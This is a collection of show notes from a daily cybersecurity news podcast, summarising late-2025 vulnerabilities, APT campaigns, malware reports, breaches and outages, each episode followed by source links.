Welcome to your daily cybersecurity podcast.

We open this edition with several security advisories published by CERT-FR regarding critical vulnerabilities affecting major components of the Linux ecosystem and enterprise environments. The bulletins notably concern Ubuntu, Red Hat, and IBM products, which are exposed to flaws that may allow privilege escalation, arbitrary code execution, or compromise of confidentiality. These vulnerabilities affect widely deployed components in server and cloud infrastructures, highlighting the need for rigorous patch management in critical environments.

We then analyze a vulnerability affecting the Roundcube webmail, referenced as CVE-2025-68461. This flaw allows a remote attacker to exploit input handling mechanisms in order to compromise session security or execute malicious code in the context of the targeted user. Given the widespread use of Roundcube in email infrastructures, this vulnerability represents a significant risk for Internet-exposed organizations.

Finally, we review a security vulnerability patched by Microsoft, identified as CVE-2025-13699. This flaw affects a Windows system component and may be exploited to bypass security mechanisms or gain elevated privileges. Microsoft has released fixes through its update guide and recommends prompt application to reduce the risk of active exploitation.

Sources

• CERT-FR – Ubuntu vulnerabilities: https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-1139/
• CERT-FR – Red Hat vulnerabilities: https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-1141/
• CERT-FR – IBM product vulnerabilities: https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-1137/
• Roundcube vulnerability – CVE-2025-68461:https://cyberveille.esante.gouv.fr/alertes/roundcube-cve-2025-68461-2025-12-26
• Microsoft – CVE-2025-13699:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-13699

Don’t think, patch!

Your feedback is welcome.
Email: radiocsirt@gmail.com
Website: https://www.radiocsirt.com
Weekly Newsletter: https://radiocsirtenglishedition.substack.com/

Welcome to your daily cybersecurity podcast.

We open this edition with a case combining cybercrime and intelligence activities in Eastern Europe. In Georgia, the former head of counterintelligence has been arrested as part of an investigation into large-scale scam centers. Authorities suspect he facilitated or protected structured fraud operations targeting international victims, once again highlighting the convergence of organized crime, corruption, and cyber fraud.

We then analyze a phishing campaign targeting cryptocurrency users through fake emails impersonating Grubhub. The messages promise a tenfold return on cryptocurrency sent by victims. Funds are immediately redirected to attacker-controlled wallets with no possibility of recovery, illustrating a classic yet still highly effective use of social engineering applied to digital assets.

Finally, we examine an operation attributed to Evasive Panda, a China-linked threat actor, which conducted espionage activities using a hijacked DNS infrastructure. The attackers leveraged advanced DNS resolution and traffic redirection techniques to deliver stealthy malicious payloads while bypassing multiple network detection mechanisms. This campaign highlights the continued evolution of APT tradecraft in state-sponsored cyber espionage.

Sources

• Arrest in Georgia – scam centers:https://therecord.media/republic-of-georgia-former-spy-chief-arrested-scam-centers
• Crypto phishing campaign – fake Grubhub emails:https://www.bleepingcomputer.com/news/security/fake-grubhub-emails-promise-tenfold-return-on-sent-cryptocurrency/
• Evasive Panda APT – malicious DNS infrastructure:https://thehackernews.com/2025/12/china-linked-evasive-panda-ran-dns.html

Don’t think, patch!

Your feedback is welcome.
Email: radiocsirt@gmail.com
Website: https://www.radiocsirt.com
Weekly Newsletter: https://radiocsirtenglishedition.substack.com/

Welcome to your daily cybersecurity podcast.

We open this edition with a geopolitical sequence marking a new phase in transatlantic tensions over digital regulation. The United States have imposed visa restrictions on several European figures involved in regulating technology platforms, including Thierry Breton, former European Commissioner. Washington justifies the decision by accusing European regulators of extraterritorial censorship, notably in the enforcement of the Digital Services Act. The European Union condemned the measure and requested formal explanations, citing an attack on its regulatory sovereignty.

We then analyze CVE-2018-25154, a critical buffer overflow vulnerability affecting GNU Barcode version 0.99. The flaw, linked to the Code 93 encoding mechanism, enables arbitrary code execution through crafted input files. The CVSS 3.1 score is critical at 9.8, with high impact on confidentiality, integrity, and availability.

We also review CVE-2023-36525, an unauthenticated Blind SQL Injection affecting the WPJobBoard WordPress plugin up to version 5.9.0. The vulnerability is remotely exploitable without privileges or user interaction and exposes affected sites to data leakage and persistent modification risks.

In the cybercrime segment, the FBI seized the web3adspanels.org infrastructure, used as a backend to centralize stolen banking credentials from phishing campaigns. The infrastructure enabled account takeover operations against financial institutions and remained active until late 2025.

We then cover Urban VPN Proxy, a free VPN browser extension whose recent versions implement interception and exfiltration of AI platform conversations, including prompts, responses, and session metadata, enabled by default.

Finally, we address the active exploitation of CVE-2020-12812 on FortiGate firewalls, an older vulnerability still abused to bypass 2FA through inconsistencies between FortiGate and LDAP username case handling.

Sources

• Tech regulation and USA–EU tensions:https://www.01net.com/actualites/pourquoi-les-etats-unis-sattaquent-a-thierry-breton-et-aux-autres-regulateurs-de-la-tech.html
• CVE-2018-25154 – GNU Barcode buffer overflow:https://cvefeed.io/vuln/detail/
• CVE-2018-25154CVE-2023-36525 – WPJobBoard Blind SQL Injection:https://cvefeed.io/vuln/detail/CVE-2023-36525
• FBI Seizure – web3adspanels.org:https://securityaffairs.com/186094/cyber-crime/fbi-seized-web3adspanels-org-hosting-stolen-logins.html
• Urban VPN Proxy data harvesting:https://boingboing.net/2025/12/19/this-free-vpn-is-a-massive-security-risk.htmlFortiGate 2FA bypass exploitation:https://cyberpress.org/hackers-abuse-3-year-old-fortigate-flaw/

Don’t think, patch!

Your feedback is welcome.
Email: radiocsirt@gmail.com
Website: https://www.radiocsirt.com
Weekly Newsletter: https://radiocsirtenglishedition.substack.com/

Welcome to your daily cybersecurity podcast.

A new initiative brings together volunteer cybersecurity experts to help protect water utilities against growing cyber threats. Experienced professionals from the DEF CON Franklin community are paired with water service providers across several U.S. states to conduct assessments, map operational technology (OT) environments, and implement security measures tailored to critical infrastructure constraints. This community-driven model aims to offset limited internal resources and improve resilience against targeted industrial cyberattacks.

MongoDB has issued an urgent warning urging administrators to immediately patch a severe remote code execution vulnerability affecting components of its ecosystem. The flaw could allow unauthenticated attackers to execute arbitrary code on exposed Node.js servers. Proof-of-concept exploits are publicly available, significantly increasing the risk of real-world exploitation.

Security researchers have uncovered a large-scale compromise campaign involving the PCPcat malware, which exploited critical flaws in Next.js and React server components. More than 59,000 servers were compromised within 48 hours, with attackers harvesting credentials, SSH keys, and environment variables while establishing persistent access using stealthy processes and tunnels.

In France, La Poste and its banking subsidiary, La Banque Postale, suffered major service disruptions following a distributed denial-of-service (DDoS) attack during the holiday period. Several online services, including parcel tracking and digital banking, were rendered unavailable. Authorities stated that no customer data was compromised.

Finally, security teams are monitoring increased risks linked to modern JavaScript server stacks, highlighting how the rapid adoption of frameworks such as React and Next.js has expanded the attack surface for automated, industrial-scale exploitation.

Sources:

• Cyber Volunteers / Water Utility / MSSP : https://therecord.media/cyber-volunteer-water-utility-mssp
• MongoDB – Severe RCE Patch Warning : https://www.bleepingcomputer.com/news/security/mongodb-warns-admins-to-patch-severe-rce-flaw-immediately/
• PCPcat – React/Next.js Servers Breach : https://thecyberexpress.com/pcpcat-react-servers-nextjs-breach/
• La Poste – Outage After a Cyber Attack : https://securityaffairs.com/186064/security/la-poste-outage-after-a-cyber-attack.html

Don’t think, patch!

Your feedback is welcome.
Email: radiocsirt@gmail.com
Website: https://www.radiocsirt.com
Weekly Newsletter: https://radiocsirtenglishedition.substack.com/

Welcome to your daily cybersecurity podcast.

CISA has added CVE-2023-52163 to its Known Exploited Vulnerabilities Catalog, confirming active exploitation of Digiever DS-2105 Pro network video recorders. This missing authorization flaw allows unauthenticated attackers to bypass security controls. While BOD 22-01 mandates federal agencies to remediate, CISA urges all organizations to prioritize firmware updates. This vulnerability serves as a frequent entry point for actors targeting IoT infrastructure and physical security networks.

Genians Security Center reports on APT37's "Artemis" campaign targeting South Korean entities through malicious HWP documents. The attack chain leverages OLE objects and DLL side-loading via the legitimate VolumeId utility to deploy the RoKRAT module. The threat actor employs steganography within images and abuses cloud services like Yandex and pCloud for C2 operations. This multi-stage procedure leverages legitimate execution flows to evade detection by signature-based security solutions.

SoundCloud disclosed a cyberattack targeting an ancillary service dashboard, resulting in a data leak affecting 26 million accounts. Exposed data includes email addresses and public profile information; passwords and financial data were not compromised. The incident was followed by DDoS attacks affecting availability. Remediation efforts, specifically reinforcing Identity and Access Management controls, inadvertently caused temporary connectivity issues for VPN users.

Socket Security identified two malicious Chrome extensions, named Phantom Shuttle, stealing credentials from 170+ enterprise domains including AWS and GitHub. These extensions use onAuthRequired listeners to inject hardcoded proxy credentials and PAC scripts to reroute sensitive traffic. Operating as a Man-in-the-Middle, the malware exfiltrates plaintext credentials, session cookies, and API keys to the C2 server phantomshuttle[.]space every five minutes.

Anna’s Archive released a 300-terabyte dataset containing 86 million scraped Spotify tracks. The breach was achieved through systematic stream-ripping using third-party user accounts over several months. Spotify responded by disabling offending accounts and implementing new safeguards to block automated playback patterns. This massive exfiltration of metadata and audio files represents a significant challenge for digital rights management and creator protection.

Sources:
CISA KEV Digiever : https://www.cisa.gov/news-events/alerts/2025/12/22/cisa-adds-one-known-exploited-vulnerability-catalog
APT37 Artemis : https://www.genians.co.kr/en/blog/threat_intelligence/dll
SoundCloud Breach : https://www.theregister.com/2025/12/16/soundcloud_cyberattack_data_leak/
Chrome Phantom Shuttle : https://thehackernews.com/2025/12/two-chrome-extensions-caught-secretly.html
Spotify Scraping : https://therecord.media/spotify-disables-scraping-annas

Don’t think, patch!

Your feedback is welcome.
Email: radiocsirt@gmail.com
Website: https://www.radiocsirt.com
Weekly Newsletter: https://radiocsirtenglishedition.substack.com/

Welcome to your daily cybersecurity podcast.

Pornhub alerts Premium subscribers following data exposure on November 8, 2025, via analytics provider Mixpanel. Cybercriminals threaten to directly contact affected users by email. Mixpanel disputes that data originated from its November 8 security incident, stating no evidence of exfiltration from its systems. Pornhub confirms passwords, payment details, and financial information remain uncompromised, with exposure limited to a restricted set of analytics events. Attackers exploit this data for sextortion campaigns specifically targeting identified Premium users.

Intezer documents a Goffee group campaign targeting Russian military personnel and defense organizations. The initial attack identified in October uses a malicious XLL file uploaded from Ukraine then Russia to VirusTotal, titled "enemy's planned targets". The file deploys EchoGather backdoor to collect system information, execute commands, and exfiltrate files to a C2 server disguised as food delivery website. Phishing lures include fake concert invitation for senior military officers and letter impersonating Russia's Ministry of Industry and Trade requesting pricing justification documents for defense contracts.

CISA and NIST release draft Interagency Report 8597 on protecting identity tokens and assertions against forgery, theft, and malicious use. The document addresses recent incidents at major cloud providers targeting theft, modification, or forgery of identity tokens to access protected resources. The report covers IAM controls for systems using digitally signed assertions and tokens in access decisions. NIST requests CSPs apply Secure by Design principles, prioritizing transparency, configurability, and interoperability. Federal agencies must understand architecture and deployment models of their CSPs to align risk posture and threat environment.

Check Point Research documented GachiLoader, a heavily obfuscated Node.js loader malware distributed through the YouTube Ghost Network. The campaign leverages 39 compromised accounts spreading over 100 videos targeting game cheat users, accumulating 220,000 views since December 2024. The malware implements anti-analysis checks including 4 GB minimum RAM, 2 CPU cores, and blacklists for usernames, hostnames, and running processes. GachiLoader disables Windows Defender and adds exclusions for C:\Users, C:\ProgramData, C:\Windows, and the .sys extension. Two variants have been observed: the first downloads Rhadamanthys from C2 servers, while the second deploys Kidkadi.node utilizing Vectored Overloading technique to intercept system calls and load malicious PE.

Sources:

• Pornhub sextortion: https://www.malwarebytes.com/blog/news/2025/12/pornhub-tells-users-to-expect-sextortion-emails-after-data-exposure
• Goffee APT: https://therecord.media/cyber-spies-fake-new-year-concert-russian-phishing
• NIST/CISA tokens: https://www.cisa.gov/news-events/alerts/2025/12/22/nist-and-cisa-release-draft-interagency-report-protecting-tokens-and-assertions-tampering-theft-and
• GachiLoader: https://research.checkpoint.com/2025/gachiloader-node-js-malware-with-api-tracing/

Don’t think, patch!

Your feedback is welcome.
Email: radiocsirt@gmail.com
Website: https://www.radiocsirt.com
Weekly Newsletter: https://radiocsirtenglishedition.substack.com/

Welcome to your daily cybersecurity podcast.

Most newly registered and parked domains are now serving malicious content. Analysis shows an increasing shift of domain parking services toward hosting phishing pages, fake software updates, and redirects to scam infrastructures. These domains are used as short-lived infrastructure to bypass reputation-based defenses and accelerate fraud and malware delivery campaigns.

The Iranian APT group Infy has resurfaced with a new targeted campaign. Operations rely on spear-phishing emails delivering weaponized documents using political and diplomatic lures. Payloads include updated backdoors, Windows registry-based persistence mechanisms, and obfuscated HTTP(S) C2 channels, indicating a structured operational comeback.

NIST has released new security guidance for the use of smart speakers in home-based telehealth environments. Identified risks include interception of unencrypted voice traffic, exposure of sensitive health data, and the use of these devices as pivot points into hospital systems. Recommended mitigations focus on encrypted communications, network segmentation, and strict access control.

Sources:
Malicious domain parking: https://krebsonsecurity.com/2025/12/most-parked-domains-now-serving-malicious-content/
APT Infy: https://thehackernews.com/2025/12/iranian-infy-apt-resurfaces-with-new.html
NIST smart speakers: https://www.nist.gov/news-events/news/2025/12/securing-smart-speakers-home-health-care-nist-offers-new-guidelines

Don’t think, patch!

Your feedback is welcome.
Email: radiocsirt@gmail.com
Website:https://www.radiocsirt.com
Weekly Newsletter:https://radiocsirtenglishedition.substack.com/

Welcome to your daily cybersecurity podcast.

Amazon disclosed the detection of a North Korea-linked infiltration during an IT hiring process. A system administrator claimed to be US-based was identified through persistent keyboard latency exceeding 110 milliseconds to Seattle servers, indicating intercontinental remote operation. The control infrastructure was traced to China. Since April 2024, Amazon reports blocking more than 1,800 fraudulent hiring attempts linked to North Korea, with a 27 percent quarterly increase.

A Russian APT actor is conducting a credential phishing campaign targeting government entities across the Baltics and the Balkans. The attacks rely on HTML attachments masquerading as PDF documents, embedding institutional decoys and fake authentication forms. Credentials are exfiltrated via formcarry.com, with consistent JavaScript and regex reuse observed since at least 2023.

Microsoft confirmed a global Microsoft Teams outage impacting message delivery across all regions and clients. The incident started at 14:30 ET and was fully resolved one hour later. No indicators of malicious activity were reported.

A malware campaign abuses Microsoft Office documents, SVG files, and compressed archives to compromise Windows systems. The attack chain exploits CVE-2017-11882, uses PNG steganography, and process hollowing via RegAsm.exe to deliver RATs and information stealers.

ATM jackpotting attacks in the United States have been attributed to a criminal group deploying the Ploutus malware via physical access to ATMs. The tradecraft involves hard drive replacement or modification to control cash-dispensing modules. Losses are estimated to exceed $40 million since 2020.

Don’t think, patch.

Sources:

• Amazon infiltration:https://www.clubic.com/actualite-592366-amazon-infiltre-par-un-espion-nord-coreen-finalement-repere-a-cause-de-sa-frappe-clavier.html
• Russian APT phishing:https://strikeready.com/blog/russian-apt-actor-phishes-the-baltics-and-the-balkans/
• Microsoft Teams outage:https://www.bleepingcomputer.com/news/microsoft/microsoft-confirms-teams-is-down-and-messages-are-delayed/
• SVG and Office malware campaign:https://cybersecuritynews.com/hackers-weaponize-svg-files-and-office-documents/
• ATM jackpotting / Ploutus malware:https://www.theregister.com/2025/12/19/tren_de_aragua_atm/

Your feedback is welcome.
Email: radiocsirt@gmail.com
Website: https://www.radiocsirt.com
Weekly Newsletter: https://radiocsirtenglishedition.substack.com/